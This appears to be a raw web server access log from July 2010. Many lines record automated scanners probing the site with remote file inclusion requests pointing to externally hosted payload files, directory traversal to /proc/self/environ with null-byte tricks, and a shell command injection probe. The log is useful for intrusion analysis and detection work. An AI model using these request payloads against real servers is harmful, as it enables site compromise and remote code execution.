76.191.115.202 - - [19/Jul/2010:18:45:11 -0700] "GET /logs/access.log///skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.122.49.95 - - [19/Jul/2010:18:47:07 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pvvkus.ru/e107_images/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "redneckmba.com"
222.122.49.95 - - [19/Jul/2010:18:47:07 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pvvkus.ru/e107_images/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "redneckmba.com"
222.122.49.95 - - [19/Jul/2010:18:47:07 -0700] "GET /logs/access_100607.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pvvkus.ru/e107_images/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "redneckmba.com"
222.122.49.95 - - [19/Jul/2010:18:54:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pvvkus.ru/e107_images/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "redneckmba.com"
222.122.49.95 - - [19/Jul/2010:18:54:26 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pvvkus.ru/e107_images/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "redneckmba.com"
222.122.49.95 - - [19/Jul/2010:18:54:26 -0700] "GET /logs/access_100607.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://pvvkus.ru/e107_images/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "redneckmba.com"
70.86.118.50 - - [19/Jul/2010:18:55:03 -0700] "GET /?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:18:56:43 -0700] "GET /?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "redneckmba.com"
112.104.57.22 - - [19/Jul/2010:19:11:27 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [19/Jul/2010:19:11:29 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [19/Jul/2010:19:11:29 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:21:39 -0700] "GET /logs/access.log//?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:21:28 -0700] "GET /?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:21:28 -0700] "GET /logs//?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.810" "www.redneckmba.com"
66.163.171.205 - - [19/Jul/2010:19:26:08 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:31:17 -0700] "GET /logs/access_100614.log//?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:31:17 -0700] "GET /?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:31:17 -0700] "GET /logs//?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.810" "www.redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:33:49 -0700] "GET /logs/access_100607.log//?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:33:38 -0700] "GET /?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "redneckmba.com"
70.86.118.50 - - [19/Jul/2010:19:33:39 -0700] "GET /logs//?language_id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1944 "-" "libwww-perl/5.810" "redneckmba.com"
112.104.57.22 - - [19/Jul/2010:20:02:45 -0700] "GET /logs/access.log//?_PHPLIB[libdir]=http://www.mymw.info//x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [19/Jul/2010:20:02:45 -0700] "GET /?_PHPLIB[libdir]=http://www.mymw.info//x.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.808" "www.redneckmba.com"
112.104.57.22 - - [19/Jul/2010:20:02:46 -0700] "GET /logs//?_PHPLIB[libdir]=http://www.mymw.info//x.txt?? HTTP/1.1" 200 1944 "-" "libwww-perl/5.808" "www.redneckmba.com"
201.80.181.238 - - [19/Jul/2010:20:20:25 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.redneckmba.com"
201.80.181.238 - - [19/Jul/2010:20:20:26 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "www.redneckmba.com"
200.103.187.57 - - [19/Jul/2010:20:35:33 -0700] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
200.103.187.57 - - [19/Jul/2010:20:35:35 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.redneckmba.com"
201.80.181.238 - - [19/Jul/2010:20:41:11 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "redneckmba.com"
64.56.68.210 - - [19/Jul/2010:20:56:59 -0700] "GET /robots.txt HTTP/1.0" 404 - "http://redneckmba.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "redneckmba.com"
64.56.68.210 - - [19/Jul/2010:20:57:05 -0700] "GET / HTTP/1.0" 200 763 "http://redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "redneckmba.com"
76.13.114.106 - - [19/Jul/2010:21:06:52 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:08:31 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:08:55 -0700] "GET /logs/access.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:08:55 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:08:55 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
74.222.3.106 - - [19/Jul/2010:21:09:38 -0700] "GET /robots.txt HTTP/1.0" 404 - "http://www.redneckmba.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.redneckmba.com"
74.222.3.106 - - [19/Jul/2010:21:09:40 -0700] "GET / HTTP/1.0" 200 763 "http://www.redneckmba.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.redneckmba.com"
76.13.123.195 - - [19/Jul/2010:21:10:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:12:14 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
66.163.171.206 - - [19/Jul/2010:21:14:00 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:14:52 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
200.103.187.57 - - [19/Jul/2010:21:18:51 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/fufuck/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:25:38 -0700] "GET /logs/access_100614.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
93.158.149.32 - - [19/Jul/2010:21:28:13 -0700] "GET /logs/access_100531.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
76.13.114.106 - - [19/Jul/2010:21:36:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [19/Jul/2010:21:40:05 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:41:05 -0700] "GET /logs/access_100614.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:41:05 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:41:05 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:43:10 -0700] "GET /logs/access_100607.log//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:43:10 -0700] "GET /web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:21:43:10 -0700] "GET /logs//web2/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
66.163.171.207 - - [19/Jul/2010:21:51:33 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [19/Jul/2010:21:58:26 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.114.105 - - [19/Jul/2010:22:03:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [19/Jul/2010:22:10:19 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.220.122.210 - - [19/Jul/2010:22:16:43 -0700] "GET /logs/access_100531.log HTTP/1.1" 404 - "-" "Lynx/2.8.5rel.1 libwen-US/2.14" "www.redneckmba.com"
66.163.171.206 - - [19/Jul/2010:22:29:25 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [19/Jul/2010:22:31:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [19/Jul/2010:23:01:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [19/Jul/2010:23:09:11 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [19/Jul/2010:23:09:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:14:16 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:14:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:14:17 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:14:42 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:18:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:18:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
211.169.249.251 - - [19/Jul/2010:23:24:38 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [19/Jul/2010:23:24:38 -0700] "GET /?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [19/Jul/2010:23:24:38 -0700] "GET /logs/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [19/Jul/2010:23:24:38 -0700] "GET /logs/access.log/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [19/Jul/2010:23:24:38 -0700] "GET /?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [19/Jul/2010:23:24:38 -0700] "GET /logs/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
76.13.114.106 - - [19/Jul/2010:23:31:41 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:44:52 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:44:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:44:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:47:11 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:47:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:23:47:11 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
66.163.171.207 - - [19/Jul/2010:23:50:38 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:00:03:41 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
87.252.2.168 - - [20/Jul/2010:00:08:09 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [20/Jul/2010:00:08:09 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [20/Jul/2010:00:08:09 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [20/Jul/2010:00:08:28 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [20/Jul/2010:00:08:28 -0700] "GET /include/bbs.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [20/Jul/2010:00:08:28 -0700] "GET /logs/access.log%20%20//include/bbs.lib.inc.php?site_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [20/Jul/2010:00:09:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [20/Jul/2010:00:33:37 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:00:39:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [20/Jul/2010:01:15:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [20/Jul/2010:01:18:36 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [20/Jul/2010:01:20:48 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:48:57 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:48:57 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:49:14 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:49:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:49:17 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:50:06 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
67.205.67.73 - - [20/Jul/2010:01:50:15 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [20/Jul/2010:01:50:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [20/Jul/2010:01:50:15 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [20/Jul/2010:01:50:15 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:52:08 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:01:52:08 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
207.46.199.200 - - [20/Jul/2010:01:54:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.redneckmba.com"
212.241.251.207 - - [20/Jul/2010:01:56:50 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.businessregeneration.co.uk/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.106 - - [20/Jul/2010:01:59:58 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.207.204.37 - - [20/Jul/2010:02:11:49 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.55.73.74 - - [20/Jul/2010:02:12:00 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
81.21.78.22 - - [20/Jul/2010:02:12:49 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.myjpconnelly.com/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.207 - - [20/Jul/2010:02:13:06 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
94.73.48.52 - - [20/Jul/2010:02:17:02 -0700] "GET /logs/access.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:02:17:03 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
94.73.48.52 - - [20/Jul/2010:02:17:03 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.pathhttp://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:02:21:51 -0700] "GET /logs/access.log/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:02:21:51 -0700] "GET /logs/?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 1939 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:02:21:51 -0700] "GET /?option=com_ckforms&controller=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
211.169.249.251 - - [20/Jul/2010:02:22:02 -0700] "GET /logs/access.log/?option=com_ckforms&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.redneckmba.com"
